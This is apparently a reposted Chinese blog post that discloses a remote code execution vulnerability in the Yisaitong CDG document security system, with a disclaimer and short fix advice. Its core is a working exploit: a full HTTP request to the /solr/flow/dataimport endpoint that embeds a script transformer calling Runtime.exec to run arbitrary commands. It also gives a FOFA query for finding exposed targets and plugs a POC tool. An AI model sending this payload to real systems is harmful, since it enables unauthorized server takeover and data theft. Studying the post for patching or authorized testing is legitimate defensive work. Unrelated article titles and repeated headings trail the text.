当前位置：首页 > news >正文

亿赛通电子文档安全管理系统 RCE漏洞

news 2026/2/1 16:49:03

亿赛通电子文档安全管理系统 RCE漏洞

一、产品简介
二、漏洞概述
三、复现环境
四、漏洞复现
- 小龙POC检测:
五、修复建议

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。

二、漏洞概述

亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞，未经授权的攻击者可通过此漏洞执行任意指令，从而获取服务器权限。

三、复现环境

FOFA：app=“亿赛通-电子文档安全管理系统”

在这里插入图片描述

四、漏洞复现

burp抓包发送的POC数据

POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22执行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip<?xml version="1.0" encoding="UTF-8"?><RDF><item/></RDF>

burp成功回显截图

在这里插入图片描述
ceye后台查看

在这里插入图片描述

小龙POC检测:

说明一下，由于监管强制要求，POC要等护网后才能开放

小龙POC传送门: 小龙POC工具

在这里插入图片描述

五、修复建议

设置安全组仅对可信地址开放
升级至安全版本

亿赛通电子文档安全管理系统 RCE漏洞

亿赛通电子文档安全管理系统 RCE漏洞

一、产品简介

二、漏洞概述

三、复现环境

四、漏洞复现

小龙POC检测:

五、修复建议

相关文章：

亿赛通电子文档安全管理系统 RCE漏洞

信息安全面试题合集

vue 简单实验自定义组件传参数 props

目标检测笔记(十一)：如何结合特定区域进行目标检测（基于OpenCV的人脸检测实例）

PID直观感受简述

Tomcat运行后localhost:8080访问自己编写的网页

传感网应用开发1+X实训室建方案

PDF校对：让您的文件无瑕疵

SpringBoot--解决空字符串转枚举异常

Redis的常用数据类型详解

jpa里IdentityGenerator和IncrementGenerator的区别

基于element UI 实现 table 列拖拽

（GPT、GEE）遥感云大数据、洪涝灾害监测、红树林遥感制图、河道轮廓监测、洪涝灾害监测、GRACE重力卫星、源遥感影像

vue中实现将页面或者div内容导出为pdf格式

Ubuntu 配置国内源

分布式核心知识

【JMeter】常用线程组设置策略

【数据结构】回溯算法公式化解题 leetcode经典题目带刷：全排列、组合、子集

WPF基础入门-Class3-WPF数据模板

js将搜索的关键字加颜色

iOS 26 携众系统重磅更新，但“苹果智能”仍与国行无缘

脑机新手指南（八）：OpenBCI_GUI：从环境搭建到数据可视化（下）

基于uniapp+WebSocket实现聊天对话、消息监听、消息推送、聊天室等功能，多端兼容

STM32标准库-DMA直接存储器存取

Cloudflare 从 Nginx 到 Pingora：性能、效率与安全的全面升级

C++ Visual Studio 2017厂商给的源码没有.sln文件易兆微芯片下载工具加开机动画下载。

AI书签管理工具开发全记录（十九）：嵌入资源处理

Yolov8 目标检测蒸馏学习记录

Go 语言并发编程基础：无缓冲与有缓冲通道

Java数值运算常见陷阱与规避方法

亿赛通电子文档安全管理系统 RCE漏洞

一、 产品简介

二、 漏洞概述

三、 复现环境

四、 漏洞复现

小龙POC检测:

五、 修复建议

相关文章：

一、产品简介

二、漏洞概述

三、复现环境

四、漏洞复现

五、修复建议